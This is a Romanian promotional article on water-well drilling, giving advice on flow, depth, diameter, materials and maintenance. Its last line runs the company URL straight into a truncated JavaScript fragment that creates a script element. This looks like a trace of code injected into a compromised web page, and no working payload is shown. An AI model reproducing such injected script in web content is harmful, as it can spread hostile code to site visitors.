foraje puturi

foraje puturi

Ce anume reprezinta mai exact foraje puturi? In ultimul timp a aparut o reala piata, plina de oferte cat mai variate pentru foraje puturi. Pentru a ne asigura ca obtinem oferta potrivita, trebuie sa luam in calcul totalitatea factorilor ce pot influenta forajele, inainte de a ne decide care este varianta potrivita nevoilor noastre.

Forajul potrivit pentru mine

In decizia ce vizeaza alegerea unui anumit tip de foraj, trebuie tinut cont de factorii specifici unui foraj, factori ce pot fi garantati de sfatul unor profesionisti. Iata cele mai importante aspecte pentru foraje puturi, ce merita luate in considerare:

  • De ce debit am nevoie? Apa subterana nu se gaseste la orice adancime si nu toate apele subterane sunt potabile. Spre exemplu primul strat (straturile se mai numesc si acvifere) nu este recomandat intru cat acesta reprezinta apele pluviale care sunt contaminate cu impuritati. Straturile de asemenea nu sunt constante, asa ca debitul dorit nu va fi nici el la randul sau constant. Unele straturi pot sa sece chiar in functie de precipitatiile anuale.
  • Adancimea. Direct influentata de debitul dorit, adancimea necesara este cea care impune puterea necesara a instalatiei si materialele potrivite pentru acest tip de sapatura. Cautati un vecin care sa fi efectuat recent o lucrare de foraje puturi pentru a obtine informatiile necesare si, de ce nu, poate chiar sfaturi. Totusi, este mandatoriu sa apelati la profesionisti pentru a va efectua studiile hidrologice necesare, asa ca nu ezitati sa introduceti ajutorul unor specialisti in planul bugetului dumneavoastra.
  • Ce diametru voi folosi? Nu va lasati influentati de miturile urbane. Pentru un debit clasic nu este nevoie de diametre mari (200 mm- 300 mm). Un proiect de foraje puturi eficient este un proiect cat mai exact.
  • De ce unelte am nevoie? Tehnologia cu ajutorul careia va fi implementat proiectul este esentiala pentru ca aceasta influenteaza direct calitatea, pretul si timpul de executie al lucrarii. Aveti in minte faptul ca un foraj clasic- diamentrul 140 mm, 50-200 de metrii, trebuie executat in maxim 4 zile de la terminarea studiilor hidrotehnice.
  • Ce materiale? Calitatea materialelor inseamna foraje puturi de calitate. In acest punct al proiectului, rezervati-va ceva timp pentru a va interesa in legatura cu pietrisul margaritar, materialele de izolare si materialul tubulaturii PVC. Aceste 3 materiale sunt cruciale pentru o calitate garantata.
  • Cat vreau sa dureze? Forajele de puturi au o durata de viata foarte variata. De la 10, la 100 de ani, asigurati-va ca durata de viata promisa de comerciantul dumneavoastra este in conformitate cu pretul cerut.

Cum trebuie sa imi intretin lucrarea?

Dupa ce ati finalizat lucrarile, luati in considerare urmatoarele sfaturi pentru garantia unui produs de calitate:

  • Dupa incheierea proiectului incercati sa pompati cat mai multa apa. In acest fel va protejati filtrele de nisipul acvifer ce contine pietris. Pompand apa la debitul maxim al lucrarii va preveni blocarea inca de la inceput a filtrelor.
  • Sistemul de foraje puturi trebuie proiectat astfel incat ciclurile de pornire-oprire ale pompei submersibile sa fie cat mai putine. Un numar redus, garanteaza o viata indelungata.

Mai multe informatii vezi pe site-ul : www.Puturiapa-hidrogeofor.rovar d=document;var s=d.createElement(‘script’);